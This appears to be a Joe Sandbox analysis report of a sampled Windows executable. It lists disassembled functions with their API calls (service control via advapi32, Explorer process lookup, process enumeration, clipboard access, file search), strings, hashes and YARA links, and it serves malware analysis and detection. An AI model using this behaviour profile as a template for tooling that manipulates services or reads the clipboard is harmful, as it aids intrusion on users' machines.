API String ID: 475398151-1175602438
Opcode ID: be59e807089f97248b745c53ca39a3219066a74f0194714f243bc5dd474e570e
Instruction ID: 0a69b510856051f6b61d0db1a9f81b190fa99b7c01e08b7c8ab97ef6d6a55185
Opcode Fuzzy Hash: be59e807089f97248b745c53ca39a3219066a74f0194714f243bc5dd474e570e
Instruction Fuzzy Hash: 515105B2910288EFDF11AFA1DC499DD3FA9FF08341B10812AFA25D5271DB3AC585DB58

Function 00404738 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 215stringprocessthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040476E
memset.MSVCRT ref: 00404782
GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,?,?,00000000,?), ref: 00404792
strlen.MSVCRT ref: 0040479D
strlen.MSVCRT ref: 004047AB
FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 004047EE
GetWindowThreadProcessId.USER32(00000000,?), ref: 00404804
OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,?), ref: 0040481F
CloseHandle.KERNEL32(?,?,00000002,?,00000000,?,?,?,?,?,00000000,?), ref: 00404853
CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?), ref: 0040485A
PostMessageA.USER32(?,000005B4,00000000,00000000), ref: 00404873
EnumWindows.USER32(004046F1,00000000), ref: 0040489B
memset.MSVCRT ref: 004048B1
memset.MSVCRT ref: 004048DC
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004048F7

Part of subcall function 0040249D: _mbscpy.MSVCRT ref: 004024A5
Part of subcall function 0040249D: _mbscat.MSVCRT ref: 004024B4

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040491C
memset.MSVCRT ref: 0040492D
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040499D
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?), ref: 004049AB

Strings

Explorer.exe, xrefs: 00404798, 004047C0
Shell_TrayWnd, xrefs: 004047E9
Progman, xrefs: 00404937

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: memset$CloseHandleProcess$WindowWindowsstrlen$ByteCharCreateDirectoryEnumFindFreeLibraryMessageMultiOpenPostThreadWide_mbscat_mbscpy
String ID: Explorer.exe$Progman$Shell_TrayWnd
API String ID: 2750907313-131944459
Opcode ID: cb09099854295c43a2b8ff19ec6d32d7f7522e536fc81669b07e6c71d5f430a7
Instruction ID: ba8633467671cd5b80a546ab6ba77b9489af45562576cd9ba7d9b61210ecae71
Opcode Fuzzy Hash: cb09099854295c43a2b8ff19ec6d32d7f7522e536fc81669b07e6c71d5f430a7
Instruction Fuzzy Hash: 5D7131F280024CAFEB10EFA5DD899DE77ACEB48345F10417AFB05E21A1D7799D848B58

Function 0040EE9C Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 71libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,0040AFCC), ref: 0040EEA2
GetProcAddress.KERNEL32(00000000,OpenSCManagerA), ref: 0040EEC4
GetProcAddress.KERNEL32(OpenServiceA), ref: 0040EED6
GetProcAddress.KERNEL32(ChangeServiceConfigA), ref: 0040EEE8
GetProcAddress.KERNEL32(CloseServiceHandle), ref: 0040EEFA
GetProcAddress.KERNEL32(QueryServiceConfigA), ref: 0040EF0C
GetProcAddress.KERNEL32(ControlService), ref: 0040EF1E
GetProcAddress.KERNEL32(EnumServicesStatusA), ref: 0040EF30
GetProcAddress.KERNEL32(StartServiceA), ref: 0040EF42
GetProcAddress.KERNEL32(QueryServiceStatus), ref: 0040EF54

Strings

advapi32.dll, xrefs: 0040EE9D
EnumServicesStatusA, xrefs: 0040EF20
StartServiceA, xrefs: 0040EF32
QueryServiceStatus, xrefs: 0040EF44
OpenServiceA, xrefs: 0040EEC6
ChangeServiceConfigA, xrefs: 0040EED8
QueryServiceConfigA, xrefs: 0040EEFC
OpenSCManagerA, xrefs: 0040EEBE
CloseServiceHandle, xrefs: 0040EEEA
ControlService, xrefs: 0040EF0E

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: ChangeServiceConfigA$CloseServiceHandle$ControlService$EnumServicesStatusA$OpenSCManagerA$OpenServiceA$QueryServiceConfigA$QueryServiceStatus$StartServiceA$advapi32.dll
API String ID: 2238633743-2061868645
Opcode ID: 344faffb4b7b826b12b50d1421389f04ec4ef83f9d2c08039f414dc6b9b10eec
Instruction ID: 418a491fe3cfce54451dfe406bf80278b8cdb31336258cd7a5db0b70653a29a2
Opcode Fuzzy Hash: 344faffb4b7b826b12b50d1421389f04ec4ef83f9d2c08039f414dc6b9b10eec
Instruction Fuzzy Hash: 09211AB4D45305FEDB616F66AC085C67EA8EB98B1132B8577E414922B8D3BDC4D0DE0C

Function 0040E395 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 134processlibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E631: ??3@YAXPAX@Z.MSVCRT ref: 0040E638

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E3B5
memset.MSVCRT ref: 0040E3CA
Process32First.KERNEL32(?,?), ref: 0040E3E6
OpenProcess.KERNEL32(00000410,00000000,?,?,00000000), ref: 0040E42B
memset.MSVCRT ref: 0040E451
GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,?,?,?,?,00000000), ref: 0040E484
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameA), ref: 0040E49E
CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,00000000), ref: 0040E4D9
??3@YAXPAX@Z.MSVCRT ref: 0040E4F0
Process32Next.KERNEL32(?,00000128), ref: 0040E537
CloseHandle.KERNEL32(?,?,00000128,?,00000000), ref: 0040E547

Strings

QueryFullProcessImageNameA, xrefs: 0040E48E
kernel32.dll, xrefs: 0040E47F

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
String ID: QueryFullProcessImageNameA$kernel32.dll
API String ID: 912665193-4191084282
Opcode ID: 000bacaa7645c968ad6c93fedf77a3532d2bfdbba3292d1b8f05eaafc22c9714
Instruction ID: 22f6b5d8a5d7ba25a835bc5a6d0e0b54d3d71652abc0443083e486f9bdf64a2c
Opcode Fuzzy Hash: 000bacaa7645c968ad6c93fedf77a3532d2bfdbba3292d1b8f05eaafc22c9714
Instruction Fuzzy Hash: 955190B28002589FDB20DF56DC44ADABBB9EF44304F1085BBF919E32A1D7789A84CF54

Function 004018A1 Relevance: 15.1, APIs: 10, Instructions: 90clipboardregistrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402174: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004018B7,?), ref: 00402186

memset.MSVCRT ref: 004018DD

Part of subcall function 004027E6: ReadFile.KERNEL32(?,?,?,00000000,00000000,?,?,004018F1,00000000,?,00000004,?,00000000,00002C82), ref: 004027FD

OpenClipboard.USER32(00000000), ref: 0040192E
EmptyClipboard.USER32 ref: 0040193C
RegisterClipboardFormatA.USER32(?), ref: 00401968
GlobalAlloc.KERNEL32(00002000,?), ref: 00401978
GlobalFix.KERNEL32(00000000), ref: 00401981
GlobalUnWire.KERNEL32(00000000), ref: 0040199D
SetClipboardData.USER32(00000000,00000000), ref: 004019A8
CloseClipboard.USER32 ref: 004019C1
CloseHandle.KERNEL32(?), ref: 004019CA

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseFile$AllocCreateDataEmptyFormatHandleOpenReadRegisterWirememset
String ID:
API String ID: 1820477087-0
Opcode ID: 27e98e7ce88468d185cc580e87b1daafe92301e27ca3b71c4977a2f695b26421
Instruction ID: a4675c394ecfa312ea33a2611eefacf7057a796e26163bc2cfd1bbe495d6977c
Opcode Fuzzy Hash: 27e98e7ce88468d185cc580e87b1daafe92301e27ca3b71c4977a2f695b26421
Instruction Fuzzy Hash: E031A4B1900119ABDF206B65DD4DDEE7BBCFF04740B108176F945E11E1DB388AC0DAA9

Function 00402057 Relevance: 13.6, APIs: 9, Instructions: 61clipboardwindowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000054,?), ref: 0040208F
GetDC.USER32(00000000), ref: 00402099
CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 004020AD
ReleaseDC.USER32(00000000,00000000), ref: 004020B7
OpenClipboard.USER32(00000000), ref: 004020BE
EmptyClipboard.USER32 ref: 004020C8
SetClipboardData.USER32(00000002,00000000), ref: 004020D1
CloseClipboard.USER32 ref: 004020D7
DeleteObject.GDI32(?), ref: 004020E0

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Clipboard$Object$BitmapCloseCreateDataDeleteEmptyOpenRelease
String ID:
API String ID: 3734427525-0
Opcode ID: 948b49efa78cd34cb5948a2ead1d77f7f8d012ee64414373ebdb9c90fa15f676
Instruction ID: e756e6b672d2ad74e9aae53a1f8223d3d6b4f8ecfadebc21002408b4ecf6dbe6
Opcode Fuzzy Hash: 948b49efa78cd34cb5948a2ead1d77f7f8d012ee64414373ebdb9c90fa15f676
Instruction Fuzzy Hash: C6114872910104AFDB11ABA5EE4CDEFBBBCEF49751B004066F702E20B0DB748941DB28

Function 00405CBA Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 00405CC9
GetSystemTime.KERNEL32(A]@,00000000,?,00405D41,?,00000000,?,00000104,?,?,00405F16,?,00000000,?,?,?), ref: 00405CD8
SystemTimeToFileTime.KERNEL32(A]@,00000104,?,00405D41,?,00000000,?,00000104,?,?,00405F16,?,00000000,?,?,?), ref: 00405CE5
SystemTimeToFileTime.KERNEL32(A]@,00000104,00000000,?,00405D41,?,00000000,?,00000104,?,?,00405F16,?,00000000,?,?), ref: 00405D06
LocalFileTimeToFileTime.KERNEL32(00000104,00000104,?,00405D41,?,00000000,?,00000104,?,?,00405F16,?,00000000,?,?,?), ref: 00405D13

Strings

now, xrefs: 00405CC1
A]@, xrefs: 00405CF3, 00405CD4, 00405CE1, 00405CD7, 00405CE4, 00405D05

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Time$File$System$Local_strcmpi
String ID: A]@$now
API String ID: 7067941-3605966695
Opcode ID: df99af5a4a662ce0a6d35c5511d520787173456d950dc7badcefee651531a9b7
Instruction ID: 51a47e60848779fae563b60881bb9ff1b1cbc194a6934f6798404855bdc15f22
Opcode Fuzzy Hash: df99af5a4a662ce0a6d35c5511d520787173456d950dc7badcefee651531a9b7
Instruction Fuzzy Hash: 9BF0E175914209BBDF00ABA5DD49CDF7FBCEF58309B508432F601E60A1E634D5968B68

Function 00402D57 Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 00402D5F
strlen.MSVCRT ref: 00402D6C
GlobalAlloc.KERNEL32(00002000,00000001), ref: 00402D7B
GlobalFix.KERNEL32(00000000), ref: 00402D88
memcpy.MSVCRT ref: 00402D91
GlobalUnWire.KERNEL32(00000000), ref: 00402D9A
SetClipboardData.USER32(00000001,00000000), ref: 00402DA3
CloseClipboard.USER32 ref: 00402DB3

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
String ID:
API String ID: 2315226746-0
Opcode ID: 4222e3de1cb9742e78f938fe2f349ccf721dc592388a3f7435670d0f688f4f60
Instruction ID: 3224cc0a3c9a0eb15d6280a53dbee06dfb7e3d032b9334d82fb88866c6fb4748
Opcode Fuzzy Hash: 4222e3de1cb9742e78f938fe2f349ccf721dc592388a3f7435670d0f688f4f60
Instruction Fuzzy Hash: DCF0BB776002196BD3512BA0BC4DDDB7B6CDB88B957014179FB05D2162DA748C4047B9

Function 00402CB5 Relevance: 10.6, APIs: 7, Instructions: 66clipboardfileCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32(00000001), ref: 00402CC2
GlobalFix.KERNEL32(00000000), ref: 00402CD1
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 00402CF2
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00402CFF
CloseHandle.KERNEL32(00000000), ref: 00402D33
GlobalUnWire.KERNEL32(?), ref: 00402D43
CloseClipboard.USER32 ref: 00402D4B

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: ClipboardCloseFileGlobal$CreateDataHandlePointerWire
String ID:
API String ID: 582635635-0
Opcode ID: c3d07eb3f0121942032efe0beabfea237d3eec54400d532cf1d9fb0a95195c19
Instruction ID: a09e288ab0b32a3184ce5056086f2d8cef754a73dee96098910e7319272776ef
Opcode Fuzzy Hash: c3d07eb3f0121942032efe0beabfea237d3eec54400d532cf1d9fb0a95195c19
Instruction Fuzzy Hash: A0118C31500214BBDB241B62ED4EEDFBAB8EF85765F20812AFA01B51E0D7B95D418A68

Function 0040AC8D Relevance: 7.5, APIs: 5, Instructions: 42COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0040AC65
atoi.MSVCRT ref: 0040ACAC
atoi.MSVCRT ref: 0040ACB7
atoi.MSVCRT ref: 0040ACD2
DeviceIoControl.KERNEL32(?,0023049C,?,00000003,?,?,?), ref: 0040ACF3

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: atoi$CloseControlDeviceHandle
String ID:
API String ID: 489836140-0
Opcode ID: a63ea7fd4cf7f3c21cf761553e5ced853428e291dba67f68912874378f4d0e48
Instruction ID: e50192085bb800ac8454b05436a961e92824a757f454961b3fb52bd35b6eec38
Opcode Fuzzy Hash: a63ea7fd4cf7f3c21cf761553e5ced853428e291dba67f68912874378f4d0e48
Instruction Fuzzy Hash: 3901D4B1508388ABEF218F319C859DE3FA9EF05308F29401BFD2482263C775D549CB69

Function 004044CF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Userenv.dll), ref: 004044DD
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 004044EE

Strings

Userenv.dll, xrefs: 004044D8
CreateEnvironmentBlock, xrefs: 004044E3

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CreateEnvironmentBlock$Userenv.dll
API String ID: 2574300362-1088060867
Opcode ID: a4074be4403e1bd7847a76d3862526a2ae14e484a319b03aa2eca1f6c21475ff
Instruction ID: 4415b242e8669d18c549caa52387758033a24d38cdb7f67173fde5cf0ed58fe3
Opcode Fuzzy Hash: a4074be4403e1bd7847a76d3862526a2ae14e484a319b03aa2eca1f6c21475ff
Instruction Fuzzy Hash: 5AE0ECB9A40300AFCB109FA1EC44B863BA5BF49791F01C436B606F25B0CBB6C590DF19

Function 004030D0 Relevance: 6.1, APIs: 4, Instructions: 58filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(?,?), ref: 004030E6
FindNextFileA.KERNEL32(?,?), ref: 00403104
strlen.MSVCRT ref: 00403134
strlen.MSVCRT ref: 0040313C

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: FileFindstrlen$FirstNext
String ID:
API String ID: 379999529-0
Opcode ID: b5ed9bcbb160742e5535720eb4b7db3270fdd0b5fbfdeb788ae5e8f28fc89488
Instruction ID: 66b1e65762c0f67a041298360b25bb8eea82fa3ecc386fe1376add757eaceb09
Opcode Fuzzy Hash: b5ed9bcbb160742e5535720eb4b7db3270fdd0b5fbfdeb788ae5e8f28fc89488
Instruction Fuzzy Hash: 2B11A072505204AED7109B38D845ADBB7DC9B08326F104A3FF059D61D1EB38AA409768

Function 004024C1 Relevance: 4.5, APIs: 3, Instructions: 38fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004023AE: _mbscpy.MSVCRT ref: 004023B3
Part of subcall function 004023AE: strrchr.MSVCRT ref: 004023BB

FindFirstFileA.KERNEL32(?,?), ref: 004024E4

Part of subcall function 00405E66: memset.MSVCRT ref: 00405E8C
Part of subcall function 00405E66: strlen.MSVCRT ref: 00405EAF
Part of subcall function 00405E66: strlen.MSVCRT ref: 00405EB9

FindNextFileA.KERNEL32(00000000,?,?,?), ref: 00402513
FindClose.KERNEL32(00000000,?,?), ref: 0040251E

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Find$Filestrlen$CloseFirstNext_mbscpymemsetstrrchr
String ID:
API String ID: 392549688-0
Opcode ID: 727df42e2c638a7f21a27c3f3d28017d37e08afe7339e94c308f29071ead4a03
Instruction ID: ae02e76aec1670720a5c2dd9c3f809d3bed691bca5f9a0a9f7d389f4a09935a0
Opcode Fuzzy Hash: 727df42e2c638a7f21a27c3f3d28017d37e08afe7339e94c308f29071ead4a03
Instruction Fuzzy Hash: FFF0F431510029BACF116B71DD489EE776CEB49354F044176EE19F21E0EB749A468A98

Function 00405118 Relevance: 4.5, APIs: 3, Instructions: 29windownativeCOMMON

Download Yara Rule

APIs

PostQuitMessage.USER32(00000000), ref: 00405149
PostQuitMessage.USER32(00000000), ref: 00405156
NtdllDefWindowProc_A.NTDLL(?,00000113,?,?), ref: 00405162

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: MessagePostQuit$NtdllProc_Window
String ID:
API String ID: 2354090847-0
Opcode ID: 55734ea1980a04cf84c73b0ab8d520a3390b7dac91d289d95260b4e3ceb9bfe7
Instruction ID: 682ead158df018a0c1c7df1a9b9d394980b371d4bf8790cc6e37d058107e5c85
Opcode Fuzzy Hash: 55734ea1980a04cf84c73b0ab8d520a3390b7dac91d289d95260b4e3ceb9bfe7
Instruction Fuzzy Hash: 91F08276A0051CB6DF215E45DC04B9F7B5AEB94322F058037F7082A1E0837849518F59

Function 004023FF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(004162F0,00000104,00402439,004047E0,?,?,?,?,00000000,?), ref: 00402419

Memory Dump Source

Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_screen.jbxd

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 9cb3674f5c80016f5824f001ce381a827ddc4253af2b099b1e7d6988ea96dcd6
Instruction ID: 92d3335f98bebfad830288d8031abd2206dd3b4a267f8c4a93a33585ffed5fef
Opcode Fuzzy Hash: 9cb3674f5c80016f5824f001ce381a827ddc4253af2b099b1e7d6988ea96dcd6
Instruction Fuzzy Hash: 73C04C359122329BD7106B58BD1CBC5B698A759316F03C0FBA710A22A5C3FC8845CBDC

Function 00403C90 Relevance: 156.2, APIs: 1, Strings: 103, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strcmpi.MSVCRT ref: 00404161

Strings

CCITT_uLaw_44kHzMono, xrefs: 00404098
48kHz8BitStereo, xrefs: 00403F38
24kHz8BitStereo, xrefs: 00403E48
GSM610_44kHzMono, xrefs: 0040414E
11kHz8BitMono, xrefs: 00403CF4
32kHz8BitMono, xrefs: 00403E84
11kHz16BitMono, xrefs: 00403D1C
8, xrefs: 0040409F
CCITT_uLaw_11kHzStereo, xrefs: 00404068
ADPCM_11kHzStereo, xrefs: 004040DE
16kHz16BitStereo, xrefs: 00403DD0
48kHz16BitStereo, xrefs: 00403F60
CCITT_uLaw_44kHzStereo, xrefs: 004040A6
!, xrefs: 00403EDE
6, xrefs: 00404083
', xrefs: 00403F56
A, xrefs: 0040411D
11kHz8BitStereo, xrefs: 00403D08
22kHz8BitMono, xrefs: 00403DE4
B, xrefs: 0040412B
;, xrefs: 004040C9
12kHz8BitMono, xrefs: 00403D44
C, xrefs: 00404139
ADPCM_44kHzMono, xrefs: 00404108
,, xrefs: 00403FBE
2, xrefs: 00404036
7, xrefs: 00404091
24kHz16BitMono, xrefs: 00403E5C
ADPCM_22kHzMono, xrefs: 004040EC
24kHz16BitStereo, xrefs: 00403E70
", xrefs: 00403EF2
44kHz16BitStereo, xrefs: 00403F10
GSM610_11kHzMono, xrefs: 00404132
), xrefs: 00403F7E
ADPCM_11kHzMono, xrefs: 004040D0
0, xrefs: 0040400E
?, xrefs: 00404101
ADPCM_22kHzStereo, xrefs: 004040FA
()A, xrefs: 0040415B
GSM610_8kHzMono, xrefs: 00404124
CCITT_ALaw_8kHzStereo, xrefs: 00403F9C
, xrefs: 00403ECA
ADPCM_8kHzMono, xrefs: 004040B4
16kHz16BitMono, xrefs: 00403DBC
8kHz8BitStereo, xrefs: 00403CB8
8kHz16BitMono, xrefs: 00403CCC
., xrefs: 00403FE6
12kHz16BitStereo, xrefs: 00403D80
/, xrefs: 00403FFA
:, xrefs: 004040BB
D, xrefs: 00404147
ADPCM_8kHzStereo, xrefs: 004040C2
*, xrefs: 00403F92
5, xrefs: 00404072
CCITT_uLaw_8kHzStereo, xrefs: 00404040
(, xrefs: 00403F6A
&, xrefs: 00403F42
ADPCM_44kHzStereo, xrefs: 00404116
32kHz16BitMono, xrefs: 00403EAC
-, xrefs: 00403FD2
44kHz16BitMono, xrefs: 00403EFC
32kHz16BitStereo, xrefs: 00403EC0
CCITT_ALaw_44kHzStereo, xrefs: 00404018
GSM610_22kHzMono, xrefs: 00404140
8kHz8BitMono, xrefs: 00403CA4
